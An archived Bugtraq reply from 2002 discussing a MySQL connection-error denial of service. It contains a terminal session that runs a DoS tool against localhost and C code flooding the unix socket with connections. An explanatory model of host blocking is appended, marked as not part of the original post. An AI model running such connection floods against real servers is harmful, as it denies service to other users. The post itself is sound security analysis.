Bugtraq mailing list archives
Re: [luca.ercoli () inwind it: DoS against mysqld]
From: Simone Piunno <pioppo () ferrara linux it>
Date: Fri, 23 Aug 2002 21:18:34 +0200
Several people reported that on a typical small shared web server with mysql on localhost, a single user could DoS other co-hosted users, but they are wrong because you can always connect to mysqld on localhost via the unix socket (actually this is the default and the better way... I can't see why someone should prefer TCP).

Proof of concept:

    [pioppo@liston pioppo]$ mysql -h 127.0.0.1
    Welcome to the MySQL monitor. Commands end with ; or \g.
    Your MySQL connection id is 1 to server version: 3.23.47

    Type 'help;' or '\h' for help. Type '\c' to clear the buffer.

    mysql> exit
    Bye
    [pioppo@liston pioppo]$ ./mysqldos -h 127.0.0.1
    Sending dos ...............
    [pioppo@liston pioppo]$ mysql -h 127.0.0.1
    ERROR 1129: Host 'localhost.localdomain' is blocked because of many connection errors. Unblock with 'mysqladmin flush-hosts'
    [pioppo@liston pioppo]$ mysql -h localhost
    Welcome to the MySQL monitor. Commands end with ; or \g.
    Your MySQL connection id is 21 to server version: 3.23.47

    Type 'help;' or '\h' for help. Type '\c' to clear the buffer.

    mysql>

TCP connections from localhost are blocked, but who cares? Well educated clients don't use TCP to connect to localhost and the unix socket is not blocked.

Now, can we DoS the unix socket? No.

    [pioppo@liston pioppo]$ cat mysqlunix.c
    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    #include <sys/types.h>
    #include <sys/socket.h>
    #include <sys/un.h>
    #include <unistd.h>

    #define SOCK "/var/lib/mysql/mysql.sock"

    int main(int argc, char *argv[]){
        int sk;
        int i;
        int rc;
        struct sockaddr_un sun;

        sun.sun_family = AF_UNIX;
        strcpy(sun.sun_path, SOCK);

        printf("Sending dos on the unix socket ");
        /* open and immediately close 15 connections on the unix socket */
        for (i = 0; i < 15; i++) {
            sk = socket(PF_UNIX, SOCK_STREAM, 0);
            if (sk < 0) {
                perror("socket");
                exit(1);
            }
            rc = connect(sk, (struct sockaddr *)&sun, sizeof(sun));
            if (rc < 0) {
                perror("connect");
                exit(1);
            }
            printf(".");
            close(sk);
        }
        printf("\n");
        return 0;
    }
    [pioppo@liston pioppo]$ make mysqlunix
    cc mysqlunix.c -o mysqlunix
    [pioppo@liston pioppo]$ ./mysqlunix
    Sending dos on the unix socket ...............
    [pioppo@liston pioppo]$ mysql -h localhost
    Welcome to the MySQL monitor. Commands end with ; or \g.
    Your MySQL connection id is 56 to server version: 3.23.47

    Type 'help;' or '\h' for help. Type '\c' to clear the buffer.

    mysql>

I think the only real concern is the one proposed by Andreas Gietl:
> The only situation this can really DoS a service I can imagine is a shared hosting-environment with a central mysql-server on a remote box.
Agreed, but again I can't see anything wrong in this. Not blocking the offender would cause thread exhaustion very soon, and this would be a much worse problem: a DoS against ALL clients.

-- 
Adde parvum parvo magnus acervus erit.
Simone Piunno, FerraraLUG - http://members.ferrara.linux.it/pioppo
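
The host blocking seen in the session above, as an added example that is not part of the original post and not MySQL's own code: a simplified C model of a per-host connection-error counter, showing why every user behind one TCP client host shares the block while the unix socket and other hosts are unaffected. The threshold of 10 (standing in for MySQL's max_connect_errors), the reset on a completed handshake, and the host name db-client.example are assumptions of the model.

```c
#include <stdio.h>
#include <string.h>

#define MAX_CONNECT_ERRORS 10   /* assumed threshold (MySQL's max_connect_errors) */
#define MAX_HOSTS 16

/* Simplified model, not MySQL source: one error counter per client host name. */
struct host_entry { char name[64]; unsigned errors; };
struct host_cache { struct host_entry h[MAX_HOSTS]; int n; };

static struct host_entry *lookup(struct host_cache *c, const char *host) {
    for (int i = 0; i < c->n; i++)
        if (strcmp(c->h[i].name, host) == 0) return &c->h[i];
    if (c->n == MAX_HOSTS) return NULL;          /* table full: not tracked */
    struct host_entry *e = &c->h[c->n++];
    snprintf(e->name, sizeof e->name, "%s", host);
    e->errors = 0;
    return e;
}

/* One connection attempt. host == NULL means the unix socket, which has no
 * client host and so is never counted or blocked. handshake_ok == 0 models a
 * connection closed before the handshake completes.
 * Returns 1 if the server accepts the connection, 0 if it answers ERROR 1129. */
int attempt(struct host_cache *c, const char *host, int handshake_ok) {
    if (host == NULL) return 1;
    struct host_entry *e = lookup(c, host);
    if (e == NULL) return 1;
    if (e->errors >= MAX_CONNECT_ERRORS) return 0;   /* host is blocked */
    if (handshake_ok) e->errors = 0;                 /* success resets the count */
    else e->errors++;
    return 1;
}

/* Equivalent of 'mysqladmin flush-hosts': forget every counter. */
void flush_hosts(struct host_cache *c) { c->n = 0; }

int main(void) {
    struct host_cache c = { .n = 0 };
    for (int i = 0; i < 15; i++) attempt(&c, "localhost.localdomain", 0);
    printf("TCP from shared host:  %d\n", attempt(&c, "localhost.localdomain", 1));
    printf("unix socket:           %d\n", attempt(&c, NULL, 1));
    printf("TCP from another host: %d\n", attempt(&c, "db-client.example", 1));
    flush_hosts(&c);
    printf("TCP after flush-hosts: %d\n", attempt(&c, "localhost.localdomain", 1));
    return 0;
}
```

Because the counter is keyed by client host, a remote web server shared by many users appears to a central database as a single entry, which is the case Andreas Gietl describes.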